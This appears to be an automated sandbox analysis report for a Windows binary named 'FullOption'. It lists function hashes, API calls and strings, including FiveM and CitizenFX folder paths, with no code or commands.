                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: ##Foreground$D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-1159806708
                                                                                  • Opcode ID: e3a5b36e3b1ce24e48d8a11c2cd3d79d060c769aa45127c8ca8859d7f5e9b939
                                                                                  • Instruction ID: dd198f0b1620d6e4c8eab0ec54a510b2809d2e7de79c4708d89d7181c28c3333
                                                                                  • Opcode Fuzzy Hash: e3a5b36e3b1ce24e48d8a11c2cd3d79d060c769aa45127c8ca8859d7f5e9b939
                                                                                  • Instruction Fuzzy Hash: D351ED25D0EE8351EB65EF1798882B823E0EF61B44FA87935EA0C862C4DFBC9541D700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: @$D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-2562194563
                                                                                  • Opcode ID: 7f19d3e3f6a974a2aa4fe63cbc0add0d27abdb06fe5962c02f61c65b8a926494
                                                                                  • Instruction ID: 9c6619733024afaf4e5d29e94e841093931115f9d62bff9736f8a7e645336b4d
                                                                                  • Opcode Fuzzy Hash: 7f19d3e3f6a974a2aa4fe63cbc0add0d27abdb06fe5962c02f61c65b8a926494
                                                                                  • Instruction Fuzzy Hash: D841C533C19BC595D311DF339481368B7A0FBA9B48F18A336EF4866159DF28D491EB10
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: ##Foreground$D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-1159806708
                                                                                  • Opcode ID: a51aeedbbd587df37815eb809a42f01551b707f4c8094e4dae797b160c1def3f
                                                                                  • Instruction ID: 5a14d7b45e4b01a2b0fb2f3f41107e0915b8e7e29364e6cd0c4eb39604a1e29f
                                                                                  • Opcode Fuzzy Hash: a51aeedbbd587df37815eb809a42f01551b707f4c8094e4dae797b160c1def3f
                                                                                  • Instruction Fuzzy Hash: 0A41C922D19BC581E3219B3794413F6B360EFBE744F04E722F958365A5DF78A0959B00
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6D50C4
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6D50F8
                                                                                    • Part of subcall function 00007FF6AE6F0BD0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6AE6EE49A,?,?,0000000100000000,00007FF6AE6EE548,?,?,?,?,00007FF6AE6D5FFD), ref: 00007FF6AE6F0BFF
                                                                                    • Part of subcall function 00007FF6AE6F0BD0: memcpy.VCRUNTIME140(?,?,00000000,00007FF6AE6EE49A,?,?,0000000100000000,00007FF6AE6EE548,?,?,?,?,00007FF6AE6D5FFD), ref: 00007FF6AE6F0C17
                                                                                    • Part of subcall function 00007FF6AE6F0BD0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6AE6EE49A,?,?,0000000100000000,00007FF6AE6EE548,?,?,?,?,00007FF6AE6D5FFD), ref: 00007FF6AE6F0C37
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert$freemallocmemcpy
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 2920042107-608382026
                                                                                  • Opcode ID: a61b2b55abd747cf7f8a2a21d6ff211465a752ab0bef376877d3941fb9dc00d2
                                                                                  • Instruction ID: f948412e0ad28341933a03a9847cf0b5a2a32e3a2145f1a554fb52f17aaf0d4f
                                                                                  • Opcode Fuzzy Hash: a61b2b55abd747cf7f8a2a21d6ff211465a752ab0bef376877d3941fb9dc00d2
                                                                                  • Instruction Fuzzy Hash: 6F21E635B0AB86C6E710AF1BE8D02787791FB64740F94A435EB49C3A45DF6DE8518780
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6EE771,?,?,FFFFFFFF,00007FF6AE6D7538), ref: 00007FF6AE6EE93E
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6EE771,?,?,FFFFFFFF,00007FF6AE6D7538), ref: 00007FF6AE6EE9A3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-608382026
                                                                                  • Opcode ID: 137ede6f6d78c40f832eda325fa5d1338dd0d7422f9ccdbd854d29e3332b9c23
                                                                                  • Instruction ID: b0bf11c3c6812b9a5c10172d426e861889d2052213fdf059c3a417098fa835e2
                                                                                  • Opcode Fuzzy Hash: 137ede6f6d78c40f832eda325fa5d1338dd0d7422f9ccdbd854d29e3332b9c23
                                                                                  • Instruction Fuzzy Hash: 6B31E832A1AE9795EB50DB17EC8047977A0FBA1784F412132FA4DC3AA0CF2DE441D740
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF6AE6F754E,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AE6F7A46
                                                                                  • memcmp.VCRUNTIME140(?,?,00000000,00007FF6AE6F754E,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AE6F7AFF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassertmemcmp
                                                                                  • String ID: D:\ALLLLREALSHY\src\$idx >= 0 && idx < _Count
                                                                                  • API String ID: 2826906248-1780028390
                                                                                  • Opcode ID: 4769b228ea8449a34add1aff9f91ab2592c5ed4d6a50c02a9b2f50566e0dbd6a
                                                                                  • Instruction ID: fc801724d778c840df125e77048c54e6f25fc3c03e82c4fdea2075118b14000c
                                                                                  • Opcode Fuzzy Hash: 4769b228ea8449a34add1aff9f91ab2592c5ed4d6a50c02a9b2f50566e0dbd6a
                                                                                  • Instruction Fuzzy Hash: 47319222A15F8582EB11CF2EE0811787320FF64B88B04A622EF9D476A5DF3DE1D1C300
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FolderFreeKnownPathTask_invalid_parameter_noinfo_noreturn
                                                                                  • String ID: \DigitalEntitlements
                                                                                  • API String ID: 2444108017-955908169
                                                                                  • Opcode ID: b7c760be926119518c339dab2a384bbd7bd3ab91f68e904ba8b9e12ddcd50ad6
                                                                                  • Instruction ID: e1c419c0bf47a0f41a7e9322d3af4b8349b2f0d4c71fbe75f9704a3c3e7ebf7b
                                                                                  • Opcode Fuzzy Hash: b7c760be926119518c339dab2a384bbd7bd3ab91f68e904ba8b9e12ddcd50ad6
                                                                                  • Instruction Fuzzy Hash: CB31B752D29BC681E600EB76E8412796360FBF9754F506731F66D825E6EF6CE1C4C300
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FolderFreeKnownPathTask_invalid_parameter_noinfo_noreturn
                                                                                  • String ID: \FiveM\FiveM.app
                                                                                  • API String ID: 2444108017-1045582525
                                                                                  • Opcode ID: b2a5d8b111129e7c757b612a46dc7d09a0ee912a51e1821fa9d532d1030f38b5
                                                                                  • Instruction ID: e07bf9e8ed941ee67a137ce7c38c4d0b688b24d3e81da868b171bf7d180f1474
                                                                                  • Opcode Fuzzy Hash: b2a5d8b111129e7c757b612a46dc7d09a0ee912a51e1821fa9d532d1030f38b5
                                                                                  • Instruction Fuzzy Hash: 55319752D2AB8681E600EB76E8812796360FBF9764F506771F66D835E5EF6CE1C4C300
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FolderFreeKnownPathTask_invalid_parameter_noinfo_noreturn
                                                                                  • String ID: \CitizenFX
                                                                                  • API String ID: 2444108017-1636108408
                                                                                  • Opcode ID: 1cc13e2cde8b291fab7a915b179977fc9f616ba2c75a8c5a03e90f652e58ade9
                                                                                  • Instruction ID: 8746b8edf470cf51360bb6685515e1ff6c4e6d0203c178ead90ba5f736fc5954
                                                                                  • Opcode Fuzzy Hash: 1cc13e2cde8b291fab7a915b179977fc9f616ba2c75a8c5a03e90f652e58ade9
                                                                                  • Instruction Fuzzy Hash: 0631B752D1AB8681F600EB76D4412796360FBF9754F516331F66D825E5DF6CE1C4C300
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000000,00007FF6AE6D8D0A), ref: 00007FF6AE6EFB5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$Size > 0$[%05d]
                                                                                  • API String ID: 3234217646-2556614210
                                                                                  • Opcode ID: ca06af0497cc3025113432f2ed6d0f4655dfda24df9ce58994d0456cfcb41ef5
                                                                                  • Instruction ID: a3d336291b73316d62dea9354dada921ef6df5f55aa96a2df1af17d620c92f60
                                                                                  • Opcode Fuzzy Hash: ca06af0497cc3025113432f2ed6d0f4655dfda24df9ce58994d0456cfcb41ef5
                                                                                  • Instruction Fuzzy Hash: 5F213272B0AB4696EA20EF07EC809A937A0FB54780F806430FE0C87A84DF3CE255C740
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-608382026
                                                                                  • Opcode ID: eae3f81cff4a1269c0490aa8e2c5a71874879d30b83a931c650d9aa6d64c80b8
                                                                                  • Instruction ID: 556a0c657803947450c26aaeefc7a90232bc93ddca15ea13988b77f92053e28f
                                                                                  • Opcode Fuzzy Hash: eae3f81cff4a1269c0490aa8e2c5a71874879d30b83a931c650d9aa6d64c80b8
                                                                                  • Instruction Fuzzy Hash: 7521F626B0EA93D6E7206F2B98D02783B50BB64740F956476EB4DC7B91DE1DE8068340
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassertmemcmp
                                                                                  • String ID: D:\ALLLLREALSHY\src\$curr_cmd->UserCallback == 0
                                                                                  • API String ID: 2826906248-2062002702
                                                                                  • Opcode ID: a90e987ab81a738363092e36b4c7e73a551fa81b30570e98e7cfc9753262ae4f
                                                                                  • Instruction ID: bf606836fbabb406605610bb18d0069b9442b86b2a3745e099bef9340e0de742
                                                                                  • Opcode Fuzzy Hash: a90e987ab81a738363092e36b4c7e73a551fa81b30570e98e7cfc9753262ae4f
                                                                                  • Instruction Fuzzy Hash: 12212832B1AA4186EB50EF1AD08536C7364FB64B88F546431EB4D87698DF3DE9929B00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-608382026
                                                                                  • Opcode ID: b8351fdfb834682a3c248a37109bf76261bf8b31dfa1c0901f489551ee5b8dbd
                                                                                  • Instruction ID: e6a00e5389bad6b745984193c91c2dc3f7e7930c2266eeff2d62f256608eeff9
                                                                                  • Opcode Fuzzy Hash: b8351fdfb834682a3c248a37109bf76261bf8b31dfa1c0901f489551ee5b8dbd
                                                                                  • Instruction Fuzzy Hash: F4219525B0AA8685F710EF17E48036D77A0EB94B84F986435EA0E87366CF3CE441C700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassertmemcmp
                                                                                  • String ID: D:\ALLLLREALSHY\src\$curr_cmd->UserCallback == 0
                                                                                  • API String ID: 2826906248-2062002702
                                                                                  • Opcode ID: 9b985a45c3a560feb49c095246f4deca79a496fedb61061962b50452d8e279c6
                                                                                  • Instruction ID: 2378576589066c62a41e7dd106eb75347d19b8eaa0d2d5bfbd0cddcad9015ecb
                                                                                  • Opcode Fuzzy Hash: 9b985a45c3a560feb49c095246f4deca79a496fedb61061962b50452d8e279c6
                                                                                  • Instruction Fuzzy Hash: BD213932B1AA0585E790EB1BE18036D73A0EB28784F546431FB0D86694EF3CD9A5CB40
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$Size > 0
                                                                                  • API String ID: 3234217646-525454446
                                                                                  • Opcode ID: 1364f7707bc0fdad3a237ddd67229ba77d4a52a150f4b5eb3c3662c657efd2e3
                                                                                  • Instruction ID: 890b7eea89d764e6dbdcf37c108ab1a0aa966b94174156ca7288aac8d1409e4a
